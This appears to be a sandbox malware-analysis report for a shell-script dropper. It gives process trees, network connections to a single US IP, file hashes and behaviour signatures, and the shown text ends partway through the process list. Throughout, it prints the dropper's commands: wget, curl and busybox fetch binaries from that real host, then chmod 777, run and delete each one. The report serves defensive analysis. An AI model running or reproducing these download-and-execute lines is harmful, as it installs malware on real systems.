[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/chmod

[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj

[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/bin/rm

[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]

/usr/bin/wget

[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/chmod

[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs

[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/bin/rm

[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/chmod

[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE

[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/bin/rm

[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/chmod

[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD

[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/bin/rm

[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]

/usr/bin/wget

[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/chmod

[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65

[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/bin/rm

[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 01:33

Reported

2024-11-14 01:36

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

40s

Max time network

128s

Command Line

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A
N/A /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE N/A
N/A /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD N/A
N/A /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 N/A
N/A /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj N/A
N/A /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs N/A
N/A /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv N/A
N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW N/A
N/A /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj N/A
N/A /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs N/A
N/A /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE N/A
N/A /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD N/A
N/A /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 N/A
N/A /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR N/A
N/A /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 N/A
N/A /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 N/A
N/A /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY N/A
N/A /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W N/A
N/A /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A
File opened for modification /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /usr/bin/curl N/A
File opened for modification /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A
File opened for modification /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /usr/bin/curl N/A
File opened for modification /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A
File opened for modification /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /usr/bin/curl N/A
File opened for modification /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj /usr/bin/curl N/A
File opened for modification /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W /usr/bin/curl N/A
File opened for modification /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs /usr/bin/curl N/A
File opened for modification /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD /usr/bin/curl N/A
File opened for modification /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY /usr/bin/curl N/A
File opened for modification /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 /usr/bin/curl N/A
File opened for modification /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE /usr/bin/curl N/A
File opened for modification /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv /usr/bin/curl N/A
File opened for modification /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 /usr/bin/curl N/A
File opened for modification /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa /usr/bin/curl N/A
File opened for modification /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW /usr/bin/curl N/A
File opened for modification /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 /usr/bin/curl N/A

Processes

/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh

[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/chmod

[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR

[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/bin/rm

[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/chmod

[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4

[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/bin/rm

[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]

/usr/bin/wget

[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/chmod

[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5

[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/bin/rm

[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/chmod

[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY

[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/bin/rm

[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]

/usr/bin/wget

[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/chmod

[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W

[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/bin/rm

[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]

/usr/bin/wget

[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/chmod

[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1

[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/bin/rm

[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]

/usr/bin/wget

[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/chmod

[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv

[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/bin/rm

[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]

/usr/bin/wget

[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/chmod

[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa

[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/bin/rm

[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]

/usr/bin/wget

[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/chmod

[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW

[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/bin/rm

[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]

/usr/bin/wget

[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]

/usr/bin/curl

